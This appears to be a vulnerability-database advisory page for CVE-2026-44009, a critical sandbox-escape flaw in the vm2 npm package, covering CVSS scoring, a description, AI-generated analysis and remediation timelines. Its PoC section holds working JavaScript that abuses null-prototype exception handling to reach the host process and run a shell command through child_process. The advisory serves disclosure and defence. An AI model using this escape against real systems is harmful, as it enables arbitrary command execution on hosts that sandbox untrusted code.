What is the CVSS score of CVE-2026-44009?

CVE-2026-44009 has a CVSS 3.1 base score of 9.8 (Critical). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. EPSS exploitation probability: 0.0%.

Which versions of VM2 are affected by CVE-2026-44009?

CVE-2026-44009 is a critical remote code execution vulnerability in the VM2 npm package that allows attackers to completely bypass sandbox protections and execute arbitrary system commands on…. A patch is available.

VM2 CVE-2026-44009

CRITICAL

Exposure of Resource to Wrong Sphere (CWE-668)

2026-05-08 https://github.com/patriksimek/vm2

GHSA-9vg3-4rfj-wgcm

RCE Information Disclosure

9.8

CVSS 3.1

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Source Code Evidence Fetched

May 08, 2026 - 17:00 vuln.today

Analysis Generated

May 08, 2026 - 17:00 vuln.today

CVE Published

May 08, 2026 - 16:20 nvd

CRITICAL 9.8

Blast Radius

ecosystem impact

† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth

10 npm packages depend on vm2 (2 direct, 8 indirect)

Ecosystem-wide dependent count for version 3.11.2.

DescriptionNVD

Summary

VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.

Details

In handleException due to `// SECURITY (post-GHSA-mpf8 hardening): use from (not ensureThis) exceptions with a null proto will be assumed to come from the other side and being proxied. Therefore, it is possible to get the proxied and unproxied object of a sandbox object with a null proto when thrown and then catched which allows to get the host Function` object.

PoC

const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
const o = {__proto__: null};
try {
	throw o;
} catch (e) {
	e.f = Buffer.prototype.inspect
	o.f.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
}
`));

Impact

Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.

AnalysisAI

Remote code execution in VM2 (npm package) allows complete sandbox escape via null-prototype exception handling flaw. Attackers can execute arbitrary system commands on the host by exploiting a logic error in the exception proxy mechanism that incorrectly handles objects with null prototypes. …

RemediationAI

Within 24 hours: identify all applications and services using VM2 npm package via dependency scanning and inventory; assess whether each deployment accepts untrusted user-supplied code for sandbox execution. Within 7 days: if VM2 is used to isolate untrusted code, isolate affected systems from production networks or disable the vulnerable functionality immediately; contact vendor for patch timeline. …

Analysis

Detailed AI-generated intelligence summary covering attack vector, impact assessment, affected versions, remediation steps, and indicators of compromise.

POChttps://••••••••••.com/exploit

PATCHhttps://••••••••••.com/patch

ADVISORYhttps://••••••••••.com/advisory

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

CVE-2026-44009 vulnerability details – vuln.today

Back

VM2 CVE-2026-44009

CVSS VectorNVD

Lifecycle Timeline

Blast Radius

DescriptionNVD

Summary

Details

PoC

Impact

AnalysisAI

RemediationAI

Full analysis requires sign-in

Share

External POC / Exploit Code